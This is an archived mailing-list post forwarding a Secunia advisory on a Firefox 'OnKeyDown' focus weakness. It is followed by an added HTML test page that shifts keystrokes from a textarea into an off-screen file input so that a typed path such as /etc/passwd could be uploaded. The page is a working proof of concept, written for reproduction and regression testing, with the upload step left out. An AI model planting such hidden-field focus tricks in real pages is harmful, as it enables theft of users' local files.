Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: [SA25904] Firefox "OnKeyDown" Event Focus Weakness



> 
> TITLE:
> Firefox "OnKeyDown" Event Focus Weakness
> 
> SECUNIA ADVISORY ID:
> SA25904
> 
> VERIFY ADVISORY:
> http://secunia.com/advisories/25904/
> 
> CRITICAL:
> Not critical
> 
> IMPACT:
> Exposure of sensitive information
> 
> WHERE:
> From remote
> 
> SOFTWARE:
> Mozilla Firefox 1.x
> http://secunia.com/product/4227/
> Mozilla Firefox 2.0.x
> http://secunia.com/product/12434/
> 
> DESCRIPTION:
> Carl Hardwick has discovered a weakness in Firefox, which potentially
> can be exploited by malicious people to disclose sensitive
> information.
> 
> The weakness is caused due to a design error within the focus
> handling of form fields and can potentially be exploited by changing
> the focus from a "textarea" field to a "file upload" form field via
> the "OnKeyDown" event.
> 
> Successful exploitation allows an arbitrary file on the user's system
> to be uploaded to a malicious web site, but requires that the user is
> tricked into typing the file name into a "textarea" input form.
> 
> The weakness is confirmed in version 2.0.0.4. Other versions may also
> be affected.
> 
> SOLUTION:
> Disable JavaScript support.
> 
> Do not enter file names into form fields on untrusted web sites.
> 
> PROVIDED AND/OR DISCOVERED BY:
> Carl Hardwick
> 
> ORIGINAL ADVISORY:
> http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0646.html
> 

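A test page that reconstructs the behaviour the advisory describes, added here as an example; it is not code from Secunia, from Carl Hardwick's Full-Disclosure post or from Mozilla. A textarea's OnKeyDown handler moves focus to an off-screen file input, so that what the user keeps typing is delivered to the file input instead; a button then reports whether the typed text ended up in the file input's value, which is the check a practitioner would want when testing a browser build. The element ids, the off-screen positioning and the report wording are all constructed for this example.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>OnKeyDown focus-change test (constructed example)</title>
</head>
<body>
<p>Type a path such as <code>/etc/passwd</code> into the box below, then click "Check".</p>

<!-- The field the user believes they are typing into. -->
<textarea id="chat" rows="2" cols="40"></textarea>

<!-- The field the keystrokes are redirected to. It is positioned off-screen
     so the user never sees it; in a real attack it would sit inside a form
     posted to the attacker's server (that submit step is omitted here). -->
<input type="file" id="leak" style="position:absolute; left:-9999px">

<p><button type="button" onclick="report()">Check</button></p>
<pre id="result"></pre>

<script>
var chat = document.getElementById('chat');
var leak = document.getElementById('leak');
var result = document.getElementById('result');

// The weakness from the advisory: on the first key-down in the textarea,
// move focus to the file input. On an affected build (Secunia confirmed
// 2.0.0.4) the keystrokes that follow, starting with this one, go into the
// file input's text box rather than the textarea. Once focus has moved the
// textarea receives no further key-down events, so no guard is needed.
chat.onkeydown = function () {
  leak.focus();
};

// Report what, if anything, landed in the file input. On an affected build
// leak.value holds the path the user typed, and that is exactly what a form
// submit would upload. Current browsers accept no typed text in a file input,
// so there the value stays empty and the keystrokes are simply discarded.
function report() {
  var text;
  if (leak.value) {
    text = 'AFFECTED: file input now holds "' + leak.value + '"; '
         + 'submitting the form would upload that file.';
  } else {
    text = 'NOT AFFECTED: typed text did not reach the file input '
         + '(value is empty).';
  }
  result.innerHTML = '';
  result.appendChild(document.createTextNode(text));
}
</script>
</body>
</html>
```

Open the file in the browser under test, type a path and click "Check". The page uses only `onkeydown`, `focus()` and `value`, which exist in Firefox 1.x and 2.0.x as well as in current browsers, so the same file serves both as a reproduction on an affected build and as a regression check on a fixed one. Note that on an affected build the textarea stays empty as well, which is the cue a careful user might notice; the advisory's own mitigations (disabling JavaScript, or not typing file names into forms on untrusted sites) remain the only protection on such a build.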
Copyright © Lexa Software, 1996-2009.